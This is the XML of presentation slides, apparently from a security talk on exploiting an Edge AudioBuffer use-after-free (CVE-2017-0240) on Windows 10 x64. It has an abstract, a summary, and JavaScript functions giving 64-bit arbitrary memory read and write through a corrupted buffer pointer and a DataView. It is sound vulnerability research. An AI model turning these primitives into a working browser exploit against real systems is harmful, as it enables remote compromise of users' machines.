          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to achieve arbitrary address reading and writing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF4E5FC6-C5C1-47B1-B597-8802CE8937A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027326" y="3155997"/>
            <a:ext cx="5921162" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function AAR_64(address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address.getLowBits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address.getHighBits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[target][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p_buffer_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[target][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p_buffer_high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>low = mydv.getUint32(0,true)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>high = mydv.getUint32(4,true)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return new Long(low, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>high,true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43DB6B4-500D-4DCE-9FAF-E6C2ECDDDEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948487" y="3155997"/>
            <a:ext cx="5878513" cy="4515210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function AAW_64(address, data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address.getLowBits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address.getHighBits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[target][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p_buffer_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[target][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p_buffer_high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address_high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data_lo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data.getLowBits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data_hi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data.getHighBits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mydv.setUint32(0,data_lo,true)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mydv.setUint32(4,data_hi,true)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2038158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Edge </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>AudioBuffer</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and Exploitation : Attack Demo</a:t>
              </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D487C816-AD3E-4482-B227-2E872E308E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2526801"/>
            <a:ext cx="5423722" cy="3883765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F6FE04-649C-4021-8DB9-59859E196885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6501847" y="2526801"/>
            <a:ext cx="5428239" cy="3910861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2209893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Edge </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>AudioBuffer</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and Exploitation : Summary</a:t>
              </a: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05FF97FF-EC5F-4145-B181-6C1D00744F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="4044978"/>
            <a:ext cx="10953455" cy="4067652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Based on the following reasons, CVE-2017-0240 has relatively high quality and is easy to exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function can precisely control the copy start position and data, and can accurately cover the segment structure leading to out of bound access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, if you can't control the copy start position and data, and you can't control the memory directly and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>controllablely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, how can exploit it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The following example will show an idea of converting UAF into type confusion and then translating into out-of-bounds reading and writing.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3770654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Background Knowledge</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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82596222-D19E-4D04-BB71-FDEDF43C4B76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2545500"/>
            <a:ext cx="10953455" cy="7689362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1134010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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617775" y="3660221"/>
            <a:ext cx="9874153" cy="6001643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UAF（Use-After-Free）is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a common vulnerability in object-oriented applications. In history, a large number of exploitable UAF vulnerabilities have been found in the major browser application, such as Internet Explorer, Chrome and Safari. However, in the latest Windows 10 operating system, with the introduction of many mitigation features such as isolated heap, delayed free and MEMGC. Many UAF vulnerabilities have become unexploitable. Only those high quality UAF vulnerabilities may still be exploitable, but their exploitation will become less generic and much more difficult to achieve. In view of this, this presentation aims to provide the audiences some perspectives about exploiting Edge UAF vulnerabilities on Windows 10 x64, such as how to leverage the JS object Fengshui technique to occupy the freed memory and how to convert an UAF vulnerability to other type of vulnerability etc. Arbitrary address read/write is a crucial step of modern vulnerability exploitation, this talk will focus on discussing how to convert UAF vulnerabilities into arbitrary address read/write primitives, and it will conclude with some live attack demo.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D6D392D-EAF9-4FE3-ABF0-2293E4E6A68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1846487" y="946849"/>
            <a:ext cx="8907014" cy="862857"/>
            <a:chOff x="383732" y="909324"/>
            <a:chExt cx="12098995" cy="1172077"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="平行四边形 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32AA28EB-7383-44FE-970B-477D497A10C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="383732" y="909324"/>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00</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="平行四边形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4700880-B6DB-404F-893B-44CA3E2381CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1853032" y="909324"/>
              <a:ext cx="10629695" cy="1172077"/>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5400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Abstract</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0">
